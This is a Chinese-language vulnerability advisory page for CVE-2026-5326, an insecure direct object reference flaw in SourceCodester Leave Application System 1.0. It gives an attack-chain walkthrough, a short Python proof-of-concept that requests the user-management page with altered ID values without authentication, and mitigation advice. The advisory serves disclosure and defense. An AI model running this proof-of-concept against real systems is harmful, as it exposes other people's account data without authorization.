IPBUF安全漏洞报告
English
CVE-2026-5326 CVSS 5.3 中危

CVE-2026-5326 SourceCodester权限绕过漏洞

披露日期: 2026-04-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5326
漏洞类型
权限绕过
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester Leave Application System

相关标签

权限绕过IDORSourceCodesterCVE-2026-5326Web安全

漏洞概述

SourceCodester Leave Application System 1.0版本存在权限绕过漏洞。该漏洞位于/index.php?page=manage_user的用户信息处理组件中。由于系统未对用户请求中的ID参数进行严格的身份验证与授权检查,攻击者无需登录即可通过篡改该参数绕过安全机制。攻击者可利用此漏洞远程获取敏感用户信息或执行未授权操作,目前相关利用代码已公开披露。

技术细节

该漏洞本质上属于不安全的直接对象引用(IDOR)。在SourceCodester Leave Application System 1.0的代码逻辑中,文件/index.php?page=manage_user负责处理用户信息的展示与管理。漏洞产生的原因在于服务器端仅依据客户端提交的GET或POST参数“ID”来检索数据库记录,完全忽略了请求发起者的身份上下文。当攻击者发送请求时,系统未执行“访问控制检查”,即未验证当前会话用户是否拥有目标ID数据的访问权限。攻击者只需简单修改URL或数据包中的ID参数值(例如从1改为2),即可横向遍历系统内的所有用户数据。这种逻辑缺陷使得攻击者能够以低权限甚至未授权状态下接管或查看高权限账户信息,且攻击过程无需复杂交互,隐蔽性较强。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标系统正在使用SourceCodester Leave Application System 1.0,并定位到管理用户页面/index.php?page=manage_user。
STEP 2
2. 参数分析
攻击者分析页面请求,发现通过URL参数ID来指定操作的用户,且该参数直接传递给后端处理。
STEP 3
3. 构造攻击载荷
攻击者篡改请求中的ID参数,将其修改为目标用户(如管理员)的ID值,构造恶意的HTTP请求。
STEP 4
4. 执行利用
攻击者向服务器发送篡改后的请求,由于缺乏权限校验,服务器返回了目标用户的敏感信息或允许未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable endpoint target_url = "http://target-host/index.php?page=manage_user" # The vulnerability lies in the 'ID' parameter. # By changing this ID, an attacker can access other users' data without authorization. payload = { "ID": "1", # Try changing to other user IDs (e.g., 2, 3, admin_id) "action": "edit" # or 'view', depending on the application logic } try: # Sending the request without authentication or with low privilege response = requests.get(target_url, params=payload, timeout=10) if response.status_code == 200: print("[+] Request successful!") print("[+] Response content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

SourceCodester Leave Application System 1.0

防御指南

临时缓解措施
建议立即在受影响系统的后端代码中添加身份校验逻辑。在处理/index.php?page=manage_user请求时,必须检查Session中的当前用户ID是否与请求参数中的ID一致。如果不一致,应拒绝请求并记录日志。此外,建议限制管理后台的访问来源IP,直到官方补丁发布。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表